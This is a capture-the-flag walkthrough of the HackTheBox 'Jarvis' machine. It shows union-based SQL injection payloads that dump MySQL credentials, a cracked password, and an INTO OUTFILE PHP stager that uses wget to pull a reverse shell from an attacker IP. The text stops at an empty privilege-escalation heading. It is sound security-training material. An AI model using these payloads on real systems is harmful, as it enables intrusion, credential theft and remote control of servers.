HTB - Jarvis
Linux | SQLi | Sudo
Tools For This Room
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain a foothold through a union-based SQLi in room.php: dump credentials from mysql.user, then use INTO OUTFILE to write a PHP stager into the web root that fetches a reverse shell
Privesc
Scanning & Enumeration
Let's start off with nmap as usual.
nmap
nmap -sV -sC -vv <IP>
The following ports are open to us:
22: SSH
80: HTTP

We also run a full port scan in the background, but it yields no other ports.
Visiting the website on port 80 gives us a page for a luxury hotel:

We find 2 possible domain names at the bottom, which we'll add to /etc/hosts.
sudo gedit /etc/hosts
<IP> supersecurehotel.htb logger.htb
However, both hostnames serve exactly the same page as the IP, so there is no virtual-host-specific content to find here.
Let's enumerate further with gobuster to see what directories are available to us.
gobuster
gobuster dir -u <IP> -w <wordlist>
We get the usual array of directories, but /phpmyadmin gives us a login page. Unfortunately, the usual default combinations (admin/password, etc.) don't work here. Worth remembering, though: if we recover database credentials later, this is a place to try them.

Let's return to the hotel website and see if we can find anything useful. After some poking around, we find that each room is loaded via room.php with a numeric parameter called cod that changes per room. A numeric ID handed straight to a database query is a classic SQLi candidate.

Let's try some basic SQLi input, by appending the following to the end of the URL:
' or 1=1
The page throws an error, which is a very encouraging sign: the stray quote made it into the SQL query unsanitised.

Gaining Foothold
Now that we've determined that it's vulnerable to SQLi, there are a few steps we'll take to enumerate the database. First, we need to find out how many columns the vulnerable query selects, because a UNION only works when both sides have the same number of columns. To do this, we append an ORDER BY clause to the URL and keep adding one more column position until it triggers an error. The error is triggered at 8, which means the query returns 7 columns.
order by 1
order by 1,2
order by 1,2,3
...
order by 1,2,3,4,5,6,7,8
Next, we need to find out which of those columns are actually rendered on the page, since only those can carry data back to us. We append a UNION SELECT with the placeholder numbers 1 to 7, but we also change the cod value to a non-existent room such as 99, so that the original query returns no row and only our UNION row is printed.
http://10.10.10.143/room.php?cod=99 union all select 1,2,3,4,5,6,7
Here we see which numbers correspond to which columns.

From here, we can query the system to learn more about it. Replacing the placeholder 2 (one of the reflected columns) with database(), we get the database's name.
union all select 1,database(),3,4,5,6,7
Here we get the name of the database.

A handy resource is Pentestmonkey's SQLi cheat sheet, which lists queries for pulling information such as usernames and password hashes. After a bit of tweaking and trial-and-error, we find the following command works (group_concat collapses every row into one string so it fits in a single reflected column):
union all select 1,(select group_concat(host,user,password) FROM mysql.user),3,4,5,6,7
The result shows a single account: host localhost, user DBadmin, and its password hash. One caveat for other targets: the password column only exists on older MySQL and MariaDB; on MySQL 5.7+ and recent MariaDB the hash lives in authentication_string instead.

A quick trip to CrackStation reveals the password: imissyou.

Let's try to get a reverse shell now. Rana Khalil has an amazing write-up on how to do this. It's a three-step process: first we use SELECT ... INTO OUTFILE to make the database write a small PHP file into the web root whose only job is to wget our reverse shell from our machine; next we request that file so the download runs; finally we request the downloaded reverse shell and catch the connection. This only works because the DBadmin account has the FILE privilege, secure_file_priv is not restricting where the server may write, and /var/www/html is writable by the database process. Before serving it, edit Pentestmonkey's php-reverse-shell.php so that $ip is our address and $port is 4444. Then start a web server on the port the payload will fetch from (5555 below; SimpleHTTPServer defaults to 8000, so the port must be given explicitly) and a netcat listener:
python -m SimpleHTTPServer 5555
nc -lvnp 4444
Now to write the stager file on the server. The double quotes inside exec() are backslash-escaped because the PHP sits inside a single-quoted SQL string, and the port in the URL matches the web server we just started.
union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.12:5555/php-reverse-shell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
Then we request the file we just wrote; its exec() runs wget, which pulls php-reverse-shell.php from our machine and saves it as shell.php in the web root.
http://<IP>/test4.php
Finally we request http://<IP>/shell.php, which connects back to our netcat listener on port 4444, and we have our shell!

Privilege Escalation